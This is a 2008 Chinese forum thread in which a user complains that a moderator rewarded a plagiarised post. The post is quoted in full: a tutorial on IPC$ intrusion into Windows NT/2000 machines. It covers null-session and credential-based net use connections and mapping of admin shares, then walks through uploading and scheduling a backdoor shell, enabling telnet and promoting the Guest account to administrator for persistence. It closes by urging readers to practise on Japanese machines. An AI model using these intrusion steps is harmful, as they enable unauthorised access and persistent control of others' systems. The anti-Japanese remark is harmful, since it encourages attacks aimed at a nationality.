明顯的轉(zhuǎn)載 文章，抄襲，還原創(chuàng)加分？

411911

在安全防范專區(qū)，其中一篇文章“[安全防范] 一份詳盡的IPC$入侵資料 ” 詳細(xì)內(nèi)容如下：\r\n\r\n一 嘮叨一下：\r\n網(wǎng)上關(guān)于ipc$入侵的文章可謂多如牛毛,而且也不乏優(yōu)秀之作,攻擊步驟甚至可以說已經(jīng)成為經(jīng)典的模式,因此也沒人愿意再把這已經(jīng)成為定式的東西拿出來擺弄.\r\n不過話雖這樣說,但我個人認(rèn)為這些文章講解的并不詳細(xì),對于第一次接觸ipc$的菜鳥來說,簡單的羅列步驟并不能解答他們的許多迷惑(你隨便找一個hack論壇搜一下ipc,看存在的疑惑有多少).\r\n因此我寫了這篇相當(dāng)于解惑的教程.想把一些容易混淆,容易迷惑人的問題說清楚,讓大家不要總徘徊在原地!如果你看完這篇帖子仍有疑問,請馬上回復(fù)!\r\n\r\n\r\n二 什么是ipc$\r\nIPC$(Internet Process Connection)是共享\"命名管道\"的資源(大家都是這么說的)，它是為了讓進(jìn)程間通信而開放的命名管道，可以通過驗證用戶名和密碼獲得相應(yīng)的權(quán)限,在遠(yuǎn)程管理計算機(jī)和查看計算機(jī)的共享資源時使用。\r\n利用IPC$,連接者甚至可以與目標(biāo)主機(jī)建立一個空的連接而無需用戶名與密碼(當(dāng)然,對方機(jī)器必須開了ipc$共享,否則你是連接不上的)，而利用這個空的連接，連接者還可以得到目標(biāo)主機(jī)上的用戶列表(不過負(fù)責(zé)的管理員會禁止導(dǎo)出用戶列表的)。\r\n我們總在說ipc$漏洞ipc$漏洞,其實,ipc$并不是真正意義上的漏洞,它是為了方便管理員的遠(yuǎn)程管理而開放的遠(yuǎn)程網(wǎng)絡(luò)登陸功能,而且還打開了默認(rèn)共享,即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)。\r\n所有的這些,初衷都是為了方便管理員的管理,但好的初衷并不一定有好的收效,一些別有用心者(到底是什么用心?我也不知道,代詞一個)會利用IPC$，訪問共享資源,導(dǎo)出用戶列表,并使用一些字典工具，進(jìn)行密碼探測,寄希望于獲得更高的權(quán)限,從而達(dá)到不可告人的目的.\r\n\r\n解惑:\r\n1)IPC連接是Windows NT及以上系統(tǒng)中特有的遠(yuǎn)程網(wǎng)絡(luò)登陸功能，其功能相當(dāng)于Unix中的Telnet,由于IPC$功能需要用到Windows NT中的很多DLL函數(shù)，所以不能在Windows 9.x中運行。\r\n也就是說只有nt/2000/xp才可以建立ipc$連接,98/me是不能建立ipc$連接的(但有些朋友說在98下能建立空的連接,不知道是真是假,不過現(xiàn)在都2003年了,建議98的同志換一下系統(tǒng)吧,98不爽的)\r\n2)即使是空連接也不是100%都能建立成功,如果對方關(guān)閉了ipc$共享,你仍然無法建立連接\r\n3)并不是說建立了ipc$連接就可以查看對方的用戶列表,因為管理員可以禁止導(dǎo)出用戶列表\r\n\r\n\r\n三 建立ipc$連接在hack攻擊中的作用\r\n就像上面所說的,即使你建立了一個空的連接,你也可以獲得不少的信息(而這些信息往往是入侵中必不可少的),訪問部分共享,如果你能夠以某一個具有一定權(quán)限的用戶身份登陸的話,那么你就會得到相應(yīng)的權(quán)限,顯然,如果你以管理員身份登陸,嘿嘿,就不用我在多說了吧,what u want,u can do!!\r\n(基本上可以總結(jié)為獲取目標(biāo)信息、管理目標(biāo)進(jìn)程和服務(wù),上傳木馬并運行,如果是2000server，還可以考慮開啟終端服務(wù)方便控制.怎么樣?夠厲害吧!)\r\n不過你也不要高興的太早,因為管理員的密碼不是那么好搞到的,雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的\r\n因此今后你最大的可能就是以極小的權(quán)限甚至是沒有權(quán)限進(jìn)行連接,你會慢慢的發(fā)現(xiàn)ipc$連接并不是萬能的,甚至在主機(jī)不開啟ipc$共享時,你根本就無法連接.\r\n所以我認(rèn)為,你不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,我覺得這才是ipc$連接在hack入侵中的意義所在.\r\n\r\n\r\n四 ipc$與空連接,139,445端口,默認(rèn)共享的關(guān)系\r\n以上四者的關(guān)系可能是菜鳥很困惑的一個問題,不過大部分文章都沒有進(jìn)行特別的說明,其實我理解的也不是很透徹,都是在與大家交流中總結(jié)出來的.(一個有良好討論氛圍的BBS可以說是菜鳥的天堂)\r\n\r\n1)ipc$與空連接:\r\n不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進(jìn)行ipc$連接),自然就不能叫做空連接了.\r\n許多人可能要問了,既然可以空連接,那我以后就空連接好了,為什么還要費九牛二虎之力去掃描弱口令,呵呵,原因前面提到過,當(dāng)你以空連接登陸時,你沒有任何權(quán)限(很郁悶吧),而你以用戶或管理員的身份登陸時,你就會有相應(yīng)的權(quán)限(有權(quán)限誰不想呀,所以還是老老實實掃吧,不要偷懶喲).\r\n2)ipc$與139,445端口:\r\nipc$連接可以實現(xiàn)遠(yuǎn)程登陸及對默認(rèn)共享的訪問;而139端口的開啟表示netbios協(xié)議的應(yīng)用,我們可以通過139,445(win2000)端口實現(xiàn)對共享文件/打印機(jī)的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的.\r\n3)ipc$與默認(rèn)共享\r\n默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開啟的共享(你當(dāng)然可以關(guān)閉它),即所有的邏輯盤(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$),我們通過ipc$連接可以實現(xiàn)對這些默認(rèn)共享的訪問(前提是對方?jīng)]有關(guān)閉這些默認(rèn)共享)\r\n  \r\n\r\n五 ipc$連接失敗的原因\r\n以下5個原因是比較常見的:\r\n1)你的系統(tǒng)不是NT或以上操作系統(tǒng);\r\n2)對方?jīng)]有打開ipc$默認(rèn)共享\r\n3)對方未開啟139或445端口(惑被防火墻屏蔽)\r\n4)你的命令輸入有誤(比如缺少了空格等)\r\n5)用戶名或密碼錯誤(空連接當(dāng)然無所謂了)\r\n另外,你也可以根據(jù)返回的錯誤號分析原因：\r\n錯誤號5，拒絕訪問 ： 很可能你使用的用戶不是管理員權(quán)限的，先提升權(quán)限；\r\n錯誤號51，Windows 無法找到網(wǎng)絡(luò)路徑 : 網(wǎng)絡(luò)有問題；\r\n錯誤號53，找不到網(wǎng)絡(luò)路徑 ： ip地址錯誤；目標(biāo)未開機(jī)；目標(biāo)lanmanserver服務(wù)未啟動；目標(biāo)有防火墻（端口過濾）；\r\n錯誤號67，找不到網(wǎng)絡(luò)名 ： 你的lanmanworkstation服務(wù)未啟動；目標(biāo)刪除了ipc$；\r\n錯誤號1219，提供的憑據(jù)與已存在的憑據(jù)集沖突 ： 你已經(jīng)和對方建立了一個ipc$，請刪除再連。\r\n錯誤號1326，未知的用戶名或錯誤密碼 ： 原因很明顯了；\r\n錯誤號1792，試圖登錄，但是網(wǎng)絡(luò)登錄服務(wù)沒有啟動 ： 目標(biāo)NetLogon服務(wù)未啟動。（連接域控會出現(xiàn)此情況）\r\n錯誤號2242，此用戶的密碼已經(jīng)過期 ： 目標(biāo)有帳號策略，強(qiáng)制定期要求更改密碼。\r\n關(guān)于ipc$連不上的問題比較復(fù)雜，除了以上的原因,還會有其他一些不確定因素,在此本人無法詳細(xì)而確定的說明,就靠大家自己體會和試驗了.\r\n\r\n\r\n六  如何打開目標(biāo)的IPC$(此段引自相關(guān)文章)\r\n首先你需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、木馬,當(dāng)然，這shell必須是admin權(quán)限的,然后你可以使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請確認(rèn)相關(guān)服務(wù)都已運行，沒有就啟動它（不知道怎么做的請看net命令的用法）, 還是不行的話（比如有防火墻，殺不了）建議放棄。\r\n\r\n\r\n七  如何防范ipc$入侵\r\n1禁止空連接進(jìn)行枚舉(此操作并不能阻止空連接的建立,引自《解剖win2000下的空會話》)\r\n首先運行regedit，找到如下組建[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA]把RestrictAnonymous = DWORD的鍵值改為：00000001(如果設(shè)置為2的話,有一些問題會發(fā)生,比如一些WIN的服務(wù)出現(xiàn)問題等等)\r\n\r\n2禁止默認(rèn)共享\r\n1）察看本地共享資源\r\n運行-cmd-輸入net share\r\n2）刪除共享(每次輸入一個）\r\nnet share ipc$ /delete\r\nnet share admin$ /delete\r\nnet share c$ /delete\r\nnet share d$ /delete（如果有e,f,……可以繼續(xù)刪除）\r\n3）停止server服務(wù)\r\nnet stop server /y （重新啟動后server服務(wù)會重新開啟）\r\n4）修改注冊表\r\n運行-regedit\r\nserver版:找到如下主鍵[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services \\LanmanServer\\Parameters]把AutoShareServer（DWORD）的鍵值改為:00000000。\r\npro版:找到如下主鍵[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]把AutoShareWks（DWORD）的鍵值改為:00000000。\r\n如果上面所說的主鍵不存在，就新建(右擊-新建-雙字節(jié)值）一個主健再改鍵值。\r\n\r\n3永久關(guān)閉ipc$和默認(rèn)共享依賴的服務(wù):lanmanserver即server服務(wù)\r\n控制面板-管理工具-服務(wù)-找到server服務(wù)（右擊）-屬性-常規(guī)-啟動類型-已禁用\r\n\r\n4安裝防火墻(選中相關(guān)設(shè)置)，或者端口過濾(濾掉139,445等),或者用新版本的優(yōu)化大師\r\n\r\n5設(shè)置復(fù)雜密碼，防止通過ipc$窮舉密碼\r\n\r\n\r\n（本教程不定期更新，欲獲得最新版本，請登陸官方網(wǎng)站：菜菜鳥社區(qū)原創(chuàng)http://ccbirds.yeah.net/）\r\n\r\n\r\n八 相關(guān)命令\r\n1)建立空連接:\r\nnet use \\\\IP\\ipc$ \"\" /user:\"\"        (一定要注意:這一行命令中包含了3個空格)\r\n\r\n2)建立非空連接:\r\nnet use \\\\IP\\ipc$ \"用戶名\" /user:\"密碼\"     (同樣有3個空格)\r\n\r\n3)映射默認(rèn)共享:\r\nnet use z: \\\\IP\\c$ \"密碼\" /user:\"用戶名\"       (即可將對方的c盤映射為自己的z盤，其他盤類推)\r\n如果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP+盤符+$訪問,具體命令 net use z: \\\\IP\\c$\r\n\r\n4)刪除一個ipc$連接\r\nnet use \\\\IP\\ipc$ /del\r\n\r\n5)刪除共享映射\r\nnet use c: /del 刪除映射的c盤，其他盤類推\r\nnet use * /del 刪除全部,會有提示要求按y確認(rèn)\r\n\r\n\r\n九 經(jīng)典入侵模式\r\n這個入侵模式太經(jīng)典了,大部分ipc教程都有介紹,我也就拿過來引用了,在此感謝原創(chuàng)作者!(不知道是哪位前輩)\r\n\r\n1. C:\\>net use \\\\127.0.0.1\\IPC$ \"\" /user:\"admintitrators\"\r\n這是用《流光》掃到的用戶名是administrators，密碼為\"空\"的IP地址(空口令?哇,運氣好到家了)，如果是打算攻擊的話，就可以用這樣的命令來與127.0.0.1建立一個連接，因為密碼為\"空\"，所以第一個引號處就不用輸入，后面一個雙引號里的是用戶名，輸入 administrators，命令即可成功完成。\r\n　　\r\n2. C:\\>copy srv.exe \\\\127.0.0.1\\admin$\r\n先復(fù)制srv.exe上去，在流光的Tools目錄下就有（這里的$是指admin用戶的c:\\winnt\\system32\\，大家還可以使用c$、d$，意思是C盤與D盤，這看你要復(fù)制到什么地方去了）。\r\n　　\r\n3. C:\\>net time \\\\127.0.0.1\r\n查查時間，發(fā)現(xiàn)127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:00，命令成功完成。\r\n　　\r\n4. C:\\>at \\\\127.0.0.1 11:05 srv.exe\r\n用at命令啟動srv.exe吧（這里設(shè)置的時間要比主機(jī)時間快，不然你怎么啟動啊，呵呵�。‐r\n　　\r\n5. C:\\>net time \\\\127.0.0.1\r\n再查查到時間沒有？如果127.0.0.1 的當(dāng)前時間是 2002/3/19 上午 11:05，那就準(zhǔn)備開始下面的命令。\r\n　　\r\n6. C:\\>telnet 127.0.0.1 99\r\n這里會用到Telnet命令吧，注意端口是99。Telnet默認(rèn)的是23端口，但是我們使用的是SRV在對方計算機(jī)中為我們建立一個99端口的Shell。\r\n雖然我們可以Telnet上去了，但是SRV是一次性的，下次登錄還要再激活！所以我們打算建立一個Telnet服務(wù)！這就要用到ntlm了\r\n　　\r\n7.C:\\>copy ntlm.exe \\\\127.0.0.1\\admin$\r\n用Copy命令把ntlm.exe上傳到主機(jī)上（ntlm.exe也是在《流光》的Tools目錄中）。\r\n　　\r\n8. C:\\WINNT\\system32>ntlm\r\n輸入ntlm啟動（這里的C:\\WINNT\\system32>指的是對方計算機(jī)，運行ntlm其實是讓這個程序在對方計算機(jī)上運行）。當(dāng)出現(xiàn)\"DONE\"的時候，就說明已經(jīng)啟動正常。然后使用\"net start telnet\"來開啟Telnet服務(wù)！\r\n\r\n9. Telnet 127.0.0.1，接著輸入用戶名與密碼就進(jìn)入對方了，操作就像在DOS上操作一樣簡單！(然后你想做什么?想做什么就做什么吧,哈哈)\r\n\r\n為了以防萬一,我們再把guest激活加到管理組   \r\n10. C:\\>net user guest /active:yes\r\n將對方的Guest用戶激活\r\n\r\n11. C:\\>net user guest 1234\r\n將Guest的密碼改為1234,或者你要設(shè)定的密碼\r\n\r\n12. C:\\>net localgroup administrators guest /add\r\n將Guest變?yōu)锳dministrator^_^(如果管理員密碼更改，guest帳號沒改變的話，下次我們可以用guest再次訪問這臺計算機(jī))\r\n\r\n\r\n十 總結(jié):\r\n關(guān)于ipc入侵就說這么多了,覺得已經(jīng)夠詳細(xì)了,如果有不準(zhǔn)確的地方,希望能與大家討論.\r\n最后,希望大家不要隨便入侵,我寫這篇文章的目的是想解答大家的疑惑,并不是鼓勵大家隨便的入侵,如果你非想試一下,建議拿小日本的機(jī)子開練(什么?為什么?因為我討厭日本,沒別的)\r\n本帖最近評分記錄\r\n\r\n    * 云杉上的蝴蝶 X幣 +10 感謝您發(fā)布的原創(chuàng)，期待您的下篇佳作！ 2008-11-13 03:53\r\n    * 云杉上的蝴蝶 慶典金幣 +30 感謝您發(fā)布的原創(chuàng)，期待您的下篇佳作！ 2008-11-13 03:53\r\n\r\n本人雖然沒沒有發(fā)表過什么文章，但是這篇文章明顯的是抄襲。不過不知道這個云杉上的蝴蝶同志，有沒有讀過這篇文章，就貿(mào)然給加上原創(chuàng) 的X幣什么的，還感謝發(fā)布原創(chuàng)，這是對原創(chuàng)人員智商的侮辱。完全不負(fù)責(zé)任的加分。

云杉上的蝴蝶

終于有人發(fā)現(xiàn)問題了！ \r\n\r\n感謝樓主提交您寶貴的意見！\r\n\r\n樓主說的沒錯，這篇帖子的確是抄襲的，之前相同標(biāo)題的已有3位會員發(fā)過，類似內(nèi)容的也有多篇！\r\n\r\n從心理學(xué)角度分析，樓主在發(fā)此貼時的心里一定對我非常的BS。\r\n\r\n任何實驗都是有風(fēng)險的，不過被BS下，也沒啥大不了的，所以我做了自己想做的事。\r\n\r\n有不妥之處還請樓主同志理解一下！\r\n\r\n蝴蝶\r\n\r\n

411911

原帖由 云杉上的蝴蝶 于 2008-11-14 01:20 發(fā)表 \r\n終于有人發(fā)現(xiàn)問題了！ \r\n\r\n感謝樓主提交您寶貴的意見！\r\n\r\n樓主說的沒錯，這篇帖子的確是抄襲的，之前相同標(biāo)題的已有3位會員發(fā)過，類似內(nèi)容的也有多篇！\r\n\r\n從心理學(xué)角度分析，樓主在發(fā)此貼時的心里一定對我非常的 ... \r\n感謝樓主提交您寶貴的意見！\r\n\r\n樓主說的沒錯，這篇帖子的確是抄襲的，之前相同標(biāo)題的已有3位會員發(fā)過，類似內(nèi)容的也有多篇！\r\n\r\n從心理學(xué)角度分析，樓主在發(fā)此貼時的心里一定對我非常的BS。\r\n\r\n任何實驗都是有風(fēng)險的，不過被BS下，也沒啥大不了的，所以我做了自己想做的事。\r\n\r\n有不妥之處還請樓主同志理解一下！\r\n\r\n蝴蝶

\r\n\r\n我不是BS你，看不懂你所說的“任何實驗都是有風(fēng)險的”這句話的意思，你的意思是你給他加分是“實驗”呢還是他發(fā)的文章內(nèi)容是實驗。如果僅僅是你在做“實驗而”為他加分？你做了你想做的事是不是也指給他加分？ 你既然知道他是轉(zhuǎn)載抄襲，哪為什么還濫用職權(quán)。:wuyu: \r\n\r\n之所以原創(chuàng)專區(qū)帖子少，可能也是這個原因吧，〇缺毋濫啊。